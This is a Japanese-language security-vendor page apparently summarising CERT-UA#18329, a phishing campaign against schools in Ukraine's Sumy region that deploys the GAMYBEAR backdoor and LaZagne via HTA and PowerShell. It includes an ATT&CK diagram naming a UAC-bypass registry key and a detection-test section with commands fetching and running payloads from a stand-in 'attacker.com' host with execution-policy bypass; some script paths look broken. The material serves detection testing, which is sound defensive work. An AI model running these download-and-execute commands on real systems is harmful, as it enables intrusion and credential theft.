SOC Prime Bias: クリティカル

20 11月 2025 16:35
newspaper icon cert.gov.ua

GAMYBEARツールを使用した東ウクライナの学校への標的型サイバー攻撃(CERT-UA#18329)

GAMYBEARツールを使用した東ウクライナの学校への標的型サイバー攻撃(CERT-UA#18329)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

資格情報収集キャンペーンが、Zip添付ファイルを含むフィッシングメールを介してスーミ地方の学校や公共機関を襲いました。アーカイブを開くと、通してHTAファイルがトリガーされました mshta ユーティリティが、GAMYBEARバックドアとLaZagne資格情報ダンパーを配備するためのPowerShellスクリプトを引き出し、HTTPベースのC2を確立し、ターゲットディレクトリからファイルを流出させました。

攻撃分析

CERT-UAは、2025年5月26日にハイジャックされたGmailアカウントから送信されたフィッシングメッセージに初期の侵入を関連付け、CERT-UA#18329アラートでキャンペーンの詳細を提供しました。フォレンジック分析では、複数段階の感染チェーンが露呈しました:ZIP → HTA → update.js → PowerShell → GAMYBEARとLaZagneマルウェアを伴い、悪意あるURLからの継続的なダウンロードを伴ったレジストリエントリを介した持続性が保たれていました。

緩和策

すべてのメールアカウントに対して多要素認証を強化し、HTAや信頼できないPowerShellスクリプトの実行をブロックし、レジストリのRunキーをロックダウンし、アプリケーションホワイトリストを実装します。参照されたファイル名、ハッシュ、およびネットワークインディケーターを認識するために、エンドポイント検出規則を継続的に更新します。

対応

影響を受けたエンドポイントを直ちに隔離して、侵害されたGmailの資格情報をリセットし、特定されたすべてのIOCを収集し、GAMYBEAR、LaZagne、および関連するアーティファクトの包括的なスキャンを実行します。CERT-UAにインシデントを通知し、関連する脅威インテリジェンス共有チャネルを介してIOCを配布します。

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing[“<b>Action</b> – <b>T1566.001 フィッシング: スピアフィッシング添付ファイル</b><br/>大学の Gmail アカウントを侵害し、「Накaз № 332」という名前の ZIP 添付ファイルを含むスピアフィッシングメールを送信した。”] class action_phishing action tool_mshta[“<b>Tool</b> – <b>名前</b>: mshta.exe<br/><b>Technique</b>: T1218.005 システムバイナリプロキシ実行”] class tool_mshta tool malware_hta[“<b>Malware</b> – <b>名前</b>: zvit.hta(HTML アプリケーション)<br/>ZIP 内で配信されたショートカット経由で実行される。”] class malware_hta malware action_powershell[“<b>Action</b> – <b>T1059.001 コマンドおよびスクリプトインタープリタ: PowerShell</b><br/>HTA が update.js を起動し、updater.ps1 を実行。PowerShell がリモート HTTP サーバーから追加バイナリ(be53ff4f4b5daa.exe、svshosts.exe)をダウンロードした。”] class action_powershell action tool_ps2exe[“<b>Tool</b> – <b>名前</b>: PS2EXE<br/><b>Technique</b>: T1027.004 配信後コンパイル(難読化)”] class tool_ps2exe tool action_uac_bypass[“<b>Action</b> – <b>T1548.002 権限昇格制御の悪用: UAC バイパス</b><br/>User Account Control を回避するため、HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command キーを DelegateExecute 値付きで作成した。”] class action_uac_bypass action action_persistence[“<b>Action</b> – <b>T1547.014 ブートまたはログオン自動実行: Active Setup</b><br/>ログオン時にバイナリを起動するため、HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run にエントリ(IEUpdater、ServiceUpdateService)を追加した。”] class action_persistence action tool_registry[“<b>Tool</b> – <b>名前</b>: レジストリ変更<br/><b>Technique</b>: Run キーによる永続化”] class tool_registry tool action_credential_dump[“<b>Action</b> – <b>T1003 OS 認証情報ダンプ</b><br/>LaZagne(be53ff4f4b5daa.exe)を実行し、保存されたパスワードやその他の認証情報を抽出した。”] class action_credential_dump action tool_lazagne[“<b>Tool</b> – <b>名前</b>: LaZagne<br/><b>目的</b>: ブラウザ、メールクライアント、その他アプリケーションから保存された認証情報を取得する”] class tool_lazagne tool action_data_encoding[“<b>Action</b> – <b>T1132 データエンコーディング</b><br/>GAMYBEAR バックドアのコンポーネント(svshosts.exe、ieupdater.exe)と C2 間の通信は、Base64 エンコードされたペイロードを用いて HTTP 経由で送信された。”] class action_data_encoding action malware_gamybear[“<b>Malware</b> – <b>名前</b>: GAMYBEAR バックドア<br/>コンポーネントには svshosts.exe および ieupdater.exe が含まれる。”] class malware_gamybear malware %% Connections action_phishing u002du002d>|delivers| tool_mshta tool_mshta u002du002d>|executes| malware_hta malware_hta u002du002d>|runs| action_powershell action_powershell u002du002d>|uses| tool_ps2exe action_powershell u002du002d>|downloads| malware_gamybear action_powershell u002du002d>|creates| action_uac_bypass action_uac_bypass u002du002d>|modifies| tool_registry action_persistence u002du002d>|relies on| tool_registry action_persistence u002du002d>|launches| malware_gamybear action_credential_dump u002du002d>|uses| tool_lazagne tool_lazagne u002du002d>|collects| action_data_encoding malware_gamybear u002du002d>|communicates via| action_data_encoding %% End of diagram

攻撃フロー

シミュレーション

シミュレーション実行

前提条件:テレメトリー&ベースラインの事前フライトチェックが合格している必要があります。

理由:このセクションは、検出ルールをトリガーするために設計された敵の手法(TTP)の正確な実行を示します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。

  • 攻撃の説明&コマンド:

    1. ステージ1 – 悪意のあるHTAの配備: 攻撃者がevil.hta を妥協されたウェブサーバーにホストします。

    2. ステージ2 – 実行 mshta.exe: Windowsのコマンドプロンプトを使用して、攻撃者はmshta.exe http://attacker.com/evil.hta を実行します。これにより、コマンドラインにmshta.exe が含まれるプロセス作成イベントが生成され、ルールの最初の条件を満たします。

    3. ステージ3 – PowerShellバイパス: システムの実行ポリシーを回避するペイロードを実行するために、攻撃者は-ep bypass フラグを使用してPowerShellを起動します:

      PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"

      これにより、2番目のプロセス作成イベントが生成され、正確な文字列PowerShell -ep bypass を含み、2番目の条件を満たします。

  • 回帰テストスクリプト: 次のPowerShellスクリプトは、自動化され、繰り返し可能な形で上記のステップを再現します。

    # -------------------------------------------------
# 回帰テスト - Sigmaルールのトリガー mshta & PowerShell -ep bypass
# -------------------------------------------------

# 変数 – あなたのラボ環境に調整
$htaUrl   = "http://127.0.0.1/evil.hta"   # 到達可能なHTAファイルを指す必要があります
$psUrl    = "http://127.0.0.1/payload.ps1" # シンプルなPSペイロード(例:`Write-Host "pwned"`)

# 1. mshta.exeを呼び出す
Write-Host "[*] $htaUrlに対してmshta.exeを起動しています"
Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow

# プロセスログを確保するための短い一時停止
Start-Sleep -Seconds 2

# 2. 実行ポリシーバイパスを使用してPowerShellを呼び出す
$psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"
Write-Host "[*] PowerShell -ep bypassを起動しています"
Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow

# ロギングを許可するための一時停止
Start-Sleep -Seconds 5

Write-Host "[+] テスト完了。警告をチェックするにはあなたのSIEM を確認してください。"

  • クリーンアップコマンド: 一時ファイルの削除と、残っているテストプロセスの終了。

    # 一時ペイロードをクリーンアップ
Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue

# オプションでテストによって生成されたmshtaまたはPowerShellインスタンスを強制終了する
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force

SOCプライムのDetection as Codeプラットフォームに参加してください ビジネスに最も関連する脅威の可視性を向上させるために。開始をお手伝いし、即時の価値を提供するために、今すぐSOCプライムの専門家とミーティングを予約してください。

無料で参加